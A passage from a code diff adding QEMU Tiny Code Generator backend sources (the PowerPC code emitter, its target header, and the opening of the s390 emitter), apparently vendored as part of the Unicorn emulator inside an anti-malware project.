INDEX_op_not_i64: + tcg_out32(s, NOR | SAB(args[1], 
args[0], args[1])); + break; + + case INDEX_op_add_i64: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + do_addi_64: + tcg_out_mem_long(s, ADDI, ADD, a0, a1, a2); + } else { + tcg_out32(s, ADD | TAB(a0, a1, a2)); + } + break; + case INDEX_op_sub_i64: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[1]) { + if (const_args[2]) { + tcg_out_movi(s, TCG_TYPE_I64, a0, a1 - a2); + } else { + tcg_out32(s, SUBFIC | TAI(a0, a2, a1)); + } + } else if (const_args[2]) { + a2 = -a2; + goto do_addi_64; + } else { + tcg_out32(s, SUBF | TAB(a0, a2, a1)); + } + break; + + case INDEX_op_shl_i64: + if (const_args[2]) { + tcg_out_shli64(s, args[0], args[1], args[2]); + } else { + tcg_out32(s, SLD | SAB(args[1], args[0], args[2])); + } + break; + case INDEX_op_shr_i64: + if (const_args[2]) { + tcg_out_shri64(s, args[0], args[1], args[2]); + } else { + tcg_out32(s, SRD | SAB(args[1], args[0], args[2])); + } + break; + case INDEX_op_sar_i64: + if (const_args[2]) { + int sh = SH(args[2] & 0x1f) | (((args[2] >> 5) & 1) << 1); + tcg_out32(s, SRADI | RA(args[0]) | RS(args[1]) | sh); + } else { + tcg_out32(s, SRAD | SAB(args[1], args[0], args[2])); + } + break; + case INDEX_op_rotl_i64: + if (const_args[2]) { + tcg_out_rld(s, RLDICL, args[0], args[1], args[2], 0); + } else { + tcg_out32(s, RLDCL | SAB(args[1], args[0], args[2]) | MB64(0)); + } + break; + case INDEX_op_rotr_i64: + if (const_args[2]) { + tcg_out_rld(s, RLDICL, args[0], args[1], 64 - args[2], 0); + } else { + tcg_out32(s, SUBFIC | TAI(TCG_REG_R0, args[2], 64)); + tcg_out32(s, RLDCL | SAB(args[1], args[0], TCG_REG_R0) | MB64(0)); + } + break; + + case INDEX_op_mul_i64: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out32(s, MULLI | TAI(a0, a1, a2)); + } else { + tcg_out32(s, MULLD | TAB(a0, a1, a2)); + } + break; + case INDEX_op_div_i64: + tcg_out32(s, DIVD | TAB(args[0], args[1], args[2])); + break; + case INDEX_op_divu_i64: + tcg_out32(s, DIVDU | TAB(args[0], args[1], 
args[2])); + break; + + case INDEX_op_qemu_ld_i32: + tcg_out_qemu_ld(s, args, false); + break; + case INDEX_op_qemu_ld_i64: + tcg_out_qemu_ld(s, args, true); + break; + case INDEX_op_qemu_st_i32: + tcg_out_qemu_st(s, args, false); + break; + case INDEX_op_qemu_st_i64: + tcg_out_qemu_st(s, args, true); + break; + + case INDEX_op_ext8s_i32: + case INDEX_op_ext8s_i64: + c = EXTSB; + goto gen_ext; + case INDEX_op_ext16s_i32: + case INDEX_op_ext16s_i64: + c = EXTSH; + goto gen_ext; + case INDEX_op_ext32s_i64: + c = EXTSW; + goto gen_ext; + gen_ext: + tcg_out32(s, c | RS(args[1]) | RA(args[0])); + break; + + case INDEX_op_setcond_i32: + tcg_out_setcond(s, TCG_TYPE_I32, args[3], args[0], args[1], args[2], + const_args[2]); + break; + case INDEX_op_setcond_i64: + tcg_out_setcond(s, TCG_TYPE_I64, args[3], args[0], args[1], args[2], + const_args[2]); + break; + case INDEX_op_setcond2_i32: + tcg_out_setcond2(s, args, const_args); + break; + + case INDEX_op_bswap16_i32: + case INDEX_op_bswap16_i64: + a0 = args[0], a1 = args[1]; + /* a1 = abcd */ + if (a0 != a1) { + /* a0 = (a1 r<< 24) & 0xff # 000c */ + tcg_out_rlw(s, RLWINM, a0, a1, 24, 24, 31); + /* a0 = (a0 & ~0xff00) | (a1 r<< 8) & 0xff00 # 00dc */ + tcg_out_rlw(s, RLWIMI, a0, a1, 8, 16, 23); + } else { + /* r0 = (a1 r<< 8) & 0xff00 # 00d0 */ + tcg_out_rlw(s, RLWINM, TCG_REG_R0, a1, 8, 16, 23); + /* a0 = (a1 r<< 24) & 0xff # 000c */ + tcg_out_rlw(s, RLWINM, a0, a1, 24, 24, 31); + /* a0 = a0 | r0 # 00dc */ + tcg_out32(s, OR | SAB(TCG_REG_R0, a0, a0)); + } + break; + + case INDEX_op_bswap32_i32: + case INDEX_op_bswap32_i64: + /* Stolen from gcc's builtin_bswap32 */ + a1 = args[1]; + a0 = args[0] == a1 ? 
TCG_REG_R0 : args[0]; + + /* a1 = args[1] # abcd */ + /* a0 = rotate_left (a1, 8) # bcda */ + tcg_out_rlw(s, RLWINM, a0, a1, 8, 0, 31); + /* a0 = (a0 & ~0xff000000) | ((a1 r<< 24) & 0xff000000) # dcda */ + tcg_out_rlw(s, RLWIMI, a0, a1, 24, 0, 7); + /* a0 = (a0 & ~0x0000ff00) | ((a1 r<< 24) & 0x0000ff00) # dcba */ + tcg_out_rlw(s, RLWIMI, a0, a1, 24, 16, 23); + + if (a0 == TCG_REG_R0) { + tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); + } + break; + + case INDEX_op_bswap64_i64: + a0 = args[0], a1 = args[1], a2 = TCG_REG_R0; + if (a0 == a1) { + a0 = TCG_REG_R0; + a2 = a1; + } + + /* a1 = # abcd efgh */ + /* a0 = rl32(a1, 8) # 0000 fghe */ + tcg_out_rlw(s, RLWINM, a0, a1, 8, 0, 31); + /* a0 = dep(a0, rl32(a1, 24), 0xff000000) # 0000 hghe */ + tcg_out_rlw(s, RLWIMI, a0, a1, 24, 0, 7); + /* a0 = dep(a0, rl32(a1, 24), 0x0000ff00) # 0000 hgfe */ + tcg_out_rlw(s, RLWIMI, a0, a1, 24, 16, 23); + + /* a0 = rl64(a0, 32) # hgfe 0000 */ + /* a2 = rl64(a1, 32) # efgh abcd */ + tcg_out_rld(s, RLDICL, a0, a0, 32, 0); + tcg_out_rld(s, RLDICL, a2, a1, 32, 0); + + /* a0 = dep(a0, rl32(a2, 8), 0xffffffff) # hgfe bcda */ + tcg_out_rlw(s, RLWIMI, a0, a2, 8, 0, 31); + /* a0 = dep(a0, rl32(a2, 24), 0xff000000) # hgfe dcda */ + tcg_out_rlw(s, RLWIMI, a0, a2, 24, 0, 7); + /* a0 = dep(a0, rl32(a2, 24), 0x0000ff00) # hgfe dcba */ + tcg_out_rlw(s, RLWIMI, a0, a2, 24, 16, 23); + + if (a0 == 0) { + tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); + } + break; + + case INDEX_op_deposit_i32: + if (const_args[2]) { + uint32_t mask = ((2u << (args[4] - 1)) - 1) << args[3]; + tcg_out_andi32(s, args[0], args[0], ~mask); + } else { + tcg_out_rlw(s, RLWIMI, args[0], args[2], args[3], + 32 - args[3] - args[4], 31 - args[3]); + } + break; + case INDEX_op_deposit_i64: + if (const_args[2]) { + uint64_t mask = ((2ull << (args[4] - 1)) - 1) << args[3]; + tcg_out_andi64(s, args[0], args[0], ~mask); + } else { + tcg_out_rld(s, RLDIMI, args[0], args[2], args[3], + 64 - args[3] - args[4]); + } + break; + + case 
INDEX_op_movcond_i32: + tcg_out_movcond(s, TCG_TYPE_I32, args[5], args[0], args[1], args[2], + args[3], args[4], const_args[2]); + break; + case INDEX_op_movcond_i64: + tcg_out_movcond(s, TCG_TYPE_I64, args[5], args[0], args[1], args[2], + args[3], args[4], const_args[2]); + break; + +#if TCG_TARGET_REG_BITS == 64 + case INDEX_op_add2_i64: +#else + case INDEX_op_add2_i32: +#endif + /* Note that the CA bit is defined based on the word size of the + environment. So in 64-bit mode it's always carry-out of bit 63. + The fallback code using deposit works just as well for 32-bit. */ + a0 = args[0], a1 = args[1]; + if (a0 == args[3] || (!const_args[5] && a0 == args[5])) { + a0 = TCG_REG_R0; + } + if (const_args[4]) { + tcg_out32(s, ADDIC | TAI(a0, args[2], args[4])); + } else { + tcg_out32(s, ADDC | TAB(a0, args[2], args[4])); + } + if (const_args[5]) { + tcg_out32(s, (args[5] ? ADDME : ADDZE) | RT(a1) | RA(args[3])); + } else { + tcg_out32(s, ADDE | TAB(a1, args[3], args[5])); + } + if (a0 != args[0]) { + tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); + } + break; + +#if TCG_TARGET_REG_BITS == 64 + case INDEX_op_sub2_i64: +#else + case INDEX_op_sub2_i32: +#endif + a0 = args[0], a1 = args[1]; + if (a0 == args[5] || (!const_args[3] && a0 == args[3])) { + a0 = TCG_REG_R0; + } + if (const_args[2]) { + tcg_out32(s, SUBFIC | TAI(a0, args[4], args[2])); + } else { + tcg_out32(s, SUBFC | TAB(a0, args[4], args[2])); + } + if (const_args[3]) { + tcg_out32(s, (args[3] ? 
SUBFME : SUBFZE) | RT(a1) | RA(args[5])); + } else { + tcg_out32(s, SUBFE | TAB(a1, args[5], args[3])); + } + if (a0 != args[0]) { + tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); + } + break; + + case INDEX_op_muluh_i32: + tcg_out32(s, MULHWU | TAB(args[0], args[1], args[2])); + break; + case INDEX_op_mulsh_i32: + tcg_out32(s, MULHW | TAB(args[0], args[1], args[2])); + break; + case INDEX_op_muluh_i64: + tcg_out32(s, MULHDU | TAB(args[0], args[1], args[2])); + break; + case INDEX_op_mulsh_i64: + tcg_out32(s, MULHD | TAB(args[0], args[1], args[2])); + break; + + case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ + case INDEX_op_mov_i64: + case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ + case INDEX_op_movi_i64: + case INDEX_op_call: /* Always emitted via tcg_out_call. */ + default: + tcg_abort(); + } +} + +static const TCGTargetOpDef ppc_op_defs[] = { + { INDEX_op_exit_tb, { } }, + { INDEX_op_goto_tb, { } }, + { INDEX_op_br, { } }, + + { INDEX_op_ld8u_i32, { "r", "r" } }, + { INDEX_op_ld8s_i32, { "r", "r" } }, + { INDEX_op_ld16u_i32, { "r", "r" } }, + { INDEX_op_ld16s_i32, { "r", "r" } }, + { INDEX_op_ld_i32, { "r", "r" } }, + + { INDEX_op_st8_i32, { "r", "r" } }, + { INDEX_op_st16_i32, { "r", "r" } }, + { INDEX_op_st_i32, { "r", "r" } }, + + { INDEX_op_add_i32, { "r", "r", "ri" } }, + { INDEX_op_mul_i32, { "r", "r", "rI" } }, + { INDEX_op_div_i32, { "r", "r", "r" } }, + { INDEX_op_divu_i32, { "r", "r", "r" } }, + { INDEX_op_sub_i32, { "r", "rI", "ri" } }, + { INDEX_op_and_i32, { "r", "r", "ri" } }, + { INDEX_op_or_i32, { "r", "r", "ri" } }, + { INDEX_op_xor_i32, { "r", "r", "ri" } }, + { INDEX_op_andc_i32, { "r", "r", "ri" } }, + { INDEX_op_orc_i32, { "r", "r", "ri" } }, + { INDEX_op_eqv_i32, { "r", "r", "ri" } }, + { INDEX_op_nand_i32, { "r", "r", "r" } }, + { INDEX_op_nor_i32, { "r", "r", "r" } }, + + { INDEX_op_shl_i32, { "r", "r", "ri" } }, + { INDEX_op_shr_i32, { "r", "r", "ri" } }, + { INDEX_op_sar_i32, { "r", "r", "ri" } }, + { 
INDEX_op_rotl_i32, { "r", "r", "ri" } }, + { INDEX_op_rotr_i32, { "r", "r", "ri" } }, + + { INDEX_op_neg_i32, { "r", "r" } }, + { INDEX_op_not_i32, { "r", "r" } }, + { INDEX_op_ext8s_i32, { "r", "r" } }, + { INDEX_op_ext16s_i32, { "r", "r" } }, + { INDEX_op_bswap16_i32, { "r", "r" } }, + { INDEX_op_bswap32_i32, { "r", "r" } }, + + { INDEX_op_brcond_i32, { "r", "ri" } }, + { INDEX_op_setcond_i32, { "r", "r", "ri" } }, + { INDEX_op_movcond_i32, { "r", "r", "ri", "rZ", "rZ" } }, + + { INDEX_op_deposit_i32, { "r", "0", "rZ" } }, + + { INDEX_op_muluh_i32, { "r", "r", "r" } }, + { INDEX_op_mulsh_i32, { "r", "r", "r" } }, + +#if TCG_TARGET_REG_BITS == 64 + { INDEX_op_ld8u_i64, { "r", "r" } }, + { INDEX_op_ld8s_i64, { "r", "r" } }, + { INDEX_op_ld16u_i64, { "r", "r" } }, + { INDEX_op_ld16s_i64, { "r", "r" } }, + { INDEX_op_ld32u_i64, { "r", "r" } }, + { INDEX_op_ld32s_i64, { "r", "r" } }, + { INDEX_op_ld_i64, { "r", "r" } }, + + { INDEX_op_st8_i64, { "r", "r" } }, + { INDEX_op_st16_i64, { "r", "r" } }, + { INDEX_op_st32_i64, { "r", "r" } }, + { INDEX_op_st_i64, { "r", "r" } }, + + { INDEX_op_add_i64, { "r", "r", "rT" } }, + { INDEX_op_sub_i64, { "r", "rI", "rT" } }, + { INDEX_op_and_i64, { "r", "r", "ri" } }, + { INDEX_op_or_i64, { "r", "r", "rU" } }, + { INDEX_op_xor_i64, { "r", "r", "rU" } }, + { INDEX_op_andc_i64, { "r", "r", "ri" } }, + { INDEX_op_orc_i64, { "r", "r", "r" } }, + { INDEX_op_eqv_i64, { "r", "r", "r" } }, + { INDEX_op_nand_i64, { "r", "r", "r" } }, + { INDEX_op_nor_i64, { "r", "r", "r" } }, + + { INDEX_op_shl_i64, { "r", "r", "ri" } }, + { INDEX_op_shr_i64, { "r", "r", "ri" } }, + { INDEX_op_sar_i64, { "r", "r", "ri" } }, + { INDEX_op_rotl_i64, { "r", "r", "ri" } }, + { INDEX_op_rotr_i64, { "r", "r", "ri" } }, + + { INDEX_op_mul_i64, { "r", "r", "rI" } }, + { INDEX_op_div_i64, { "r", "r", "r" } }, + { INDEX_op_divu_i64, { "r", "r", "r" } }, + + { INDEX_op_neg_i64, { "r", "r" } }, + { INDEX_op_not_i64, { "r", "r" } }, + { INDEX_op_ext8s_i64, { "r", "r" } 
}, + { INDEX_op_ext16s_i64, { "r", "r" } }, + { INDEX_op_ext32s_i64, { "r", "r" } }, + { INDEX_op_bswap16_i64, { "r", "r" } }, + { INDEX_op_bswap32_i64, { "r", "r" } }, + { INDEX_op_bswap64_i64, { "r", "r" } }, + + { INDEX_op_brcond_i64, { "r", "ri" } }, + { INDEX_op_setcond_i64, { "r", "r", "ri" } }, + { INDEX_op_movcond_i64, { "r", "r", "ri", "rZ", "rZ" } }, + + { INDEX_op_deposit_i64, { "r", "0", "rZ" } }, + + { INDEX_op_mulsh_i64, { "r", "r", "r" } }, + { INDEX_op_muluh_i64, { "r", "r", "r" } }, +#endif + +#if TCG_TARGET_REG_BITS == 32 + { INDEX_op_brcond2_i32, { "r", "r", "ri", "ri" } }, + { INDEX_op_setcond2_i32, { "r", "r", "r", "ri", "ri" } }, +#endif + +#if TCG_TARGET_REG_BITS == 64 + { INDEX_op_add2_i64, { "r", "r", "r", "r", "rI", "rZM" } }, + { INDEX_op_sub2_i64, { "r", "r", "rI", "rZM", "r", "r" } }, +#else + { INDEX_op_add2_i32, { "r", "r", "r", "r", "rI", "rZM" } }, + { INDEX_op_sub2_i32, { "r", "r", "rI", "rZM", "r", "r" } }, +#endif + +#if TCG_TARGET_REG_BITS == 64 + { INDEX_op_qemu_ld_i32, { "r", "L" } }, + { INDEX_op_qemu_st_i32, { "S", "S" } }, + { INDEX_op_qemu_ld_i64, { "r", "L" } }, + { INDEX_op_qemu_st_i64, { "S", "S" } }, +#elif TARGET_LONG_BITS == 32 + { INDEX_op_qemu_ld_i32, { "r", "L" } }, + { INDEX_op_qemu_st_i32, { "S", "S" } }, + { INDEX_op_qemu_ld_i64, { "L", "L", "L" } }, + { INDEX_op_qemu_st_i64, { "S", "S", "S" } }, +#else + { INDEX_op_qemu_ld_i32, { "r", "L", "L" } }, + { INDEX_op_qemu_st_i32, { "S", "S", "S" } }, + { INDEX_op_qemu_ld_i64, { "L", "L", "L", "L" } }, + { INDEX_op_qemu_st_i64, { "S", "S", "S", "S" } }, +#endif + + { -1 }, +}; + +static void tcg_target_init(TCGContext *s) +{ + unsigned long hwcap = qemu_getauxval(AT_HWCAP); + if (hwcap & PPC_FEATURE_ARCH_2_06) { + have_isa_2_06 = true; + } + + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I32], 0, 0xffffffff); + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I64], 0, 0xffffffff); + tcg_regset_set32(s->tcg_target_call_clobber_regs, 0, + (1 << 
TCG_REG_R0) | + (1 << TCG_REG_R2) | + (1 << TCG_REG_R3) | + (1 << TCG_REG_R4) | + (1 << TCG_REG_R5) | + (1 << TCG_REG_R6) | + (1 << TCG_REG_R7) | + (1 << TCG_REG_R8) | + (1 << TCG_REG_R9) | + (1 << TCG_REG_R10) | + (1 << TCG_REG_R11) | + (1 << TCG_REG_R12)); + + tcg_regset_clear(s->reserved_regs); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R0); /* tcg temp */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R1); /* stack pointer */ +#if defined(_CALL_SYSV) + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R2); /* toc pointer */ +#endif +#if defined(_CALL_SYSV) || TCG_TARGET_REG_BITS == 64 + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R13); /* thread pointer */ +#endif + tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP1); /* mem temp */ + if (USE_REG_RA) { + tcg_regset_set_reg(s->reserved_regs, TCG_REG_RA); /* return addr */ + } + + tcg_add_target_add_op_defs(s, ppc_op_defs); +} + +#ifdef __ELF__ +#if TCG_TARGET_REG_BITS == 64 +# define ELF_HOST_MACHINE EM_PPC64 +#else +# define ELF_HOST_MACHINE EM_PPC +#endif +#endif /* __ELF__ */ + +static size_t dcache_bsize = 16; +static size_t icache_bsize = 16; + +void flush_icache_range(uintptr_t start, uintptr_t stop) +{ + uintptr_t p, start1, stop1; + size_t dsize = dcache_bsize; + size_t isize = icache_bsize; + + start1 = start & ~(dsize - 1); + stop1 = (stop + dsize - 1) & ~(dsize - 1); + for (p = start1; p < stop1; p += dsize) { + asm volatile ("dcbst 0,%0" : : "r"(p) : "memory"); + } + asm volatile ("sync" : : : "memory"); + + start &= start & ~(isize - 1); + stop1 = (stop + isize - 1) & ~(isize - 1); + for (p = start1; p < stop1; p += isize) { + asm volatile ("icbi 0,%0" : : "r"(p) : "memory"); + } + asm volatile ("sync" : : : "memory"); + asm volatile ("isync" : : : "memory"); +} + +#if defined _AIX +#include + +INITIALIZER(tcg_cache_init) +{ + icache_bsize = _system_configuration.icache_line; + dcache_bsize = _system_configuration.dcache_line; +} + +#elif defined __linux__ +INITIALIZER(tcg_cache_init) +{ + unsigned 
long dsize = qemu_getauxval(AT_DCACHEBSIZE); + unsigned long isize = qemu_getauxval(AT_ICACHEBSIZE); + + if (dsize == 0 || isize == 0) { + if (dsize == 0) { + fprintf(stderr, "getauxval AT_DCACHEBSIZE failed\n"); + } + if (isize == 0) { + fprintf(stderr, "getauxval AT_ICACHEBSIZE failed\n"); + } + exit(1); + } + dcache_bsize = dsize; + icache_bsize = isize; +} + +#elif defined __APPLE__ +#include +#include +#include + +INITIALIZER(tcg_cache_init) +{ + size_t len; + unsigned cacheline; + int name[2] = { CTL_HW, HW_CACHELINE }; + + len = sizeof(cacheline); + if (sysctl(name, 2, &cacheline, &len, NULL, 0)) { + perror("sysctl CTL_HW HW_CACHELINE failed"); + exit(1); + } + dcache_bsize = cacheline; + icache_bsize = cacheline; +} + +#elif defined(__FreeBSD__) || defined(__FreeBSD_kernel__) +#include +#include +#include +#include +#include +#include + +INITIALIZER(tcg_cache_init) +{ + size_t len = 4; + unsigned cacheline; + + if (sysctlbyname ("machdep.cacheline_size", &cacheline, &len, NULL, 0)) { + fprintf(stderr, "sysctlbyname machdep.cacheline_size failed: %s\n", + strerror(errno)); + exit(1); + } + dcache_bsize = cacheline; + icache_bsize = cacheline; +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ppc/tcg-target.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ppc/tcg-target.h new file mode 100644 index 0000000..32ac442 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ppc/tcg-target.h @@ -0,0 +1,111 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following 
conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#ifndef TCG_TARGET_PPC64 +#define TCG_TARGET_PPC64 1 + +#ifdef _ARCH_PPC64 +# define TCG_TARGET_REG_BITS 64 +#else +# define TCG_TARGET_REG_BITS 32 +#endif + +#define TCG_TARGET_NB_REGS 32 +#define TCG_TARGET_INSN_UNIT_SIZE 4 + +typedef enum { + TCG_REG_R0, TCG_REG_R1, TCG_REG_R2, TCG_REG_R3, + TCG_REG_R4, TCG_REG_R5, TCG_REG_R6, TCG_REG_R7, + TCG_REG_R8, TCG_REG_R9, TCG_REG_R10, TCG_REG_R11, + TCG_REG_R12, TCG_REG_R13, TCG_REG_R14, TCG_REG_R15, + TCG_REG_R16, TCG_REG_R17, TCG_REG_R18, TCG_REG_R19, + TCG_REG_R20, TCG_REG_R21, TCG_REG_R22, TCG_REG_R23, + TCG_REG_R24, TCG_REG_R25, TCG_REG_R26, TCG_REG_R27, + TCG_REG_R28, TCG_REG_R29, TCG_REG_R30, TCG_REG_R31, + + TCG_REG_CALL_STACK = TCG_REG_R1, + TCG_AREG0 = TCG_REG_R27 +} TCGReg; + +/* optional instructions automatically implemented */ +#define TCG_TARGET_HAS_ext8u_i32 0 /* andi */ +#define TCG_TARGET_HAS_ext16u_i32 0 + +/* optional instructions */ +#define TCG_TARGET_HAS_div_i32 1 +#define TCG_TARGET_HAS_rem_i32 0 +#define TCG_TARGET_HAS_rot_i32 1 +#define TCG_TARGET_HAS_ext8s_i32 1 +#define TCG_TARGET_HAS_ext16s_i32 1 +#define TCG_TARGET_HAS_bswap16_i32 1 +#define TCG_TARGET_HAS_bswap32_i32 1 +#define TCG_TARGET_HAS_not_i32 1 +#define TCG_TARGET_HAS_neg_i32 1 +#define TCG_TARGET_HAS_andc_i32 1 +#define TCG_TARGET_HAS_orc_i32 1 +#define TCG_TARGET_HAS_eqv_i32 1 +#define 
TCG_TARGET_HAS_nand_i32 1 +#define TCG_TARGET_HAS_nor_i32 1 +#define TCG_TARGET_HAS_deposit_i32 1 +#define TCG_TARGET_HAS_movcond_i32 1 +#define TCG_TARGET_HAS_mulu2_i32 0 +#define TCG_TARGET_HAS_muls2_i32 0 +#define TCG_TARGET_HAS_muluh_i32 1 +#define TCG_TARGET_HAS_mulsh_i32 1 + +#if TCG_TARGET_REG_BITS == 64 +#define TCG_TARGET_HAS_add2_i32 0 +#define TCG_TARGET_HAS_sub2_i32 0 +#define TCG_TARGET_HAS_trunc_shr_i32 0 +#define TCG_TARGET_HAS_div_i64 1 +#define TCG_TARGET_HAS_rem_i64 0 +#define TCG_TARGET_HAS_rot_i64 1 +#define TCG_TARGET_HAS_ext8s_i64 1 +#define TCG_TARGET_HAS_ext16s_i64 1 +#define TCG_TARGET_HAS_ext32s_i64 1 +#define TCG_TARGET_HAS_ext8u_i64 0 +#define TCG_TARGET_HAS_ext16u_i64 0 +#define TCG_TARGET_HAS_ext32u_i64 0 +#define TCG_TARGET_HAS_bswap16_i64 1 +#define TCG_TARGET_HAS_bswap32_i64 1 +#define TCG_TARGET_HAS_bswap64_i64 1 +#define TCG_TARGET_HAS_not_i64 1 +#define TCG_TARGET_HAS_neg_i64 1 +#define TCG_TARGET_HAS_andc_i64 1 +#define TCG_TARGET_HAS_orc_i64 1 +#define TCG_TARGET_HAS_eqv_i64 1 +#define TCG_TARGET_HAS_nand_i64 1 +#define TCG_TARGET_HAS_nor_i64 1 +#define TCG_TARGET_HAS_deposit_i64 1 +#define TCG_TARGET_HAS_movcond_i64 1 +#define TCG_TARGET_HAS_add2_i64 1 +#define TCG_TARGET_HAS_sub2_i64 1 +#define TCG_TARGET_HAS_mulu2_i64 0 +#define TCG_TARGET_HAS_muls2_i64 0 +#define TCG_TARGET_HAS_muluh_i64 1 +#define TCG_TARGET_HAS_mulsh_i64 1 +#endif + +void flush_icache_range(uintptr_t start, uintptr_t stop); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/s390/tcg-target.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/s390/tcg-target.c new file mode 100644 index 0000000..cfa8987 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/s390/tcg-target.c @@ -0,0 +1,2346 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2009 Ulrich Hecht + * Copyright (c) 2009 Alexander Graf + * Copyright (c) 2010 Richard Henderson + * + * Permission is hereby granted, free of charge, to any person obtaining a 
copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "tcg-be-ldst.h" + +/* We only support generating code for 64-bit mode. */ +#if TCG_TARGET_REG_BITS != 64 +#error "unsupported code generation mode" +#endif + +#include "elf.h" + +/* ??? The translation blocks produced by TCG are generally small enough to + be entirely reachable with a 16-bit displacement. Leaving the option for + a 32-bit displacement here Just In Case. */ +#define USE_LONG_BRANCHES 0 + +#define TCG_CT_CONST_MULI 0x100 +#define TCG_CT_CONST_ORI 0x200 +#define TCG_CT_CONST_XORI 0x400 +#define TCG_CT_CONST_CMPI 0x800 +#define TCG_CT_CONST_ADLI 0x1000 + +/* Several places within the instruction set 0 means "no register" + rather than TCG_REG_R0. */ +#define TCG_REG_NONE 0 + +/* A scratch register that may be be used throughout the backend. 
*/ +#define TCG_TMP0 TCG_REG_R14 + +#ifdef CONFIG_USE_GUEST_BASE +#define TCG_GUEST_BASE_REG TCG_REG_R13 +#else +#define TCG_GUEST_BASE_REG TCG_REG_R0 +#endif + +#ifndef GUEST_BASE +#define GUEST_BASE 0 +#endif + + +/* All of the following instructions are prefixed with their instruction + format, and are defined as 8- or 16-bit quantities, even when the two + halves of the 16-bit quantity may appear 32 bits apart in the insn. + This makes it easy to copy the values from the tables in Appendix B. */ +typedef enum S390Opcode { + RIL_AFI = 0xc209, + RIL_AGFI = 0xc208, + RIL_ALFI = 0xc20b, + RIL_ALGFI = 0xc20a, + RIL_BRASL = 0xc005, + RIL_BRCL = 0xc004, + RIL_CFI = 0xc20d, + RIL_CGFI = 0xc20c, + RIL_CLFI = 0xc20f, + RIL_CLGFI = 0xc20e, + RIL_IIHF = 0xc008, + RIL_IILF = 0xc009, + RIL_LARL = 0xc000, + RIL_LGFI = 0xc001, + RIL_LGRL = 0xc408, + RIL_LLIHF = 0xc00e, + RIL_LLILF = 0xc00f, + RIL_LRL = 0xc40d, + RIL_MSFI = 0xc201, + RIL_MSGFI = 0xc200, + RIL_NIHF = 0xc00a, + RIL_NILF = 0xc00b, + RIL_OIHF = 0xc00c, + RIL_OILF = 0xc00d, + RIL_SLFI = 0xc205, + RIL_SLGFI = 0xc204, + RIL_XIHF = 0xc006, + RIL_XILF = 0xc007, + + RI_AGHI = 0xa70b, + RI_AHI = 0xa70a, + RI_BRC = 0xa704, + RI_IIHH = 0xa500, + RI_IIHL = 0xa501, + RI_IILH = 0xa502, + RI_IILL = 0xa503, + RI_LGHI = 0xa709, + RI_LLIHH = 0xa50c, + RI_LLIHL = 0xa50d, + RI_LLILH = 0xa50e, + RI_LLILL = 0xa50f, + RI_MGHI = 0xa70d, + RI_MHI = 0xa70c, + RI_NIHH = 0xa504, + RI_NIHL = 0xa505, + RI_NILH = 0xa506, + RI_NILL = 0xa507, + RI_OIHH = 0xa508, + RI_OIHL = 0xa509, + RI_OILH = 0xa50a, + RI_OILL = 0xa50b, + + RIE_CGIJ = 0xec7c, + RIE_CGRJ = 0xec64, + RIE_CIJ = 0xec7e, + RIE_CLGRJ = 0xec65, + RIE_CLIJ = 0xec7f, + RIE_CLGIJ = 0xec7d, + RIE_CLRJ = 0xec77, + RIE_CRJ = 0xec76, + RIE_RISBG = 0xec55, + + RRE_AGR = 0xb908, + RRE_ALGR = 0xb90a, + RRE_ALCR = 0xb998, + RRE_ALCGR = 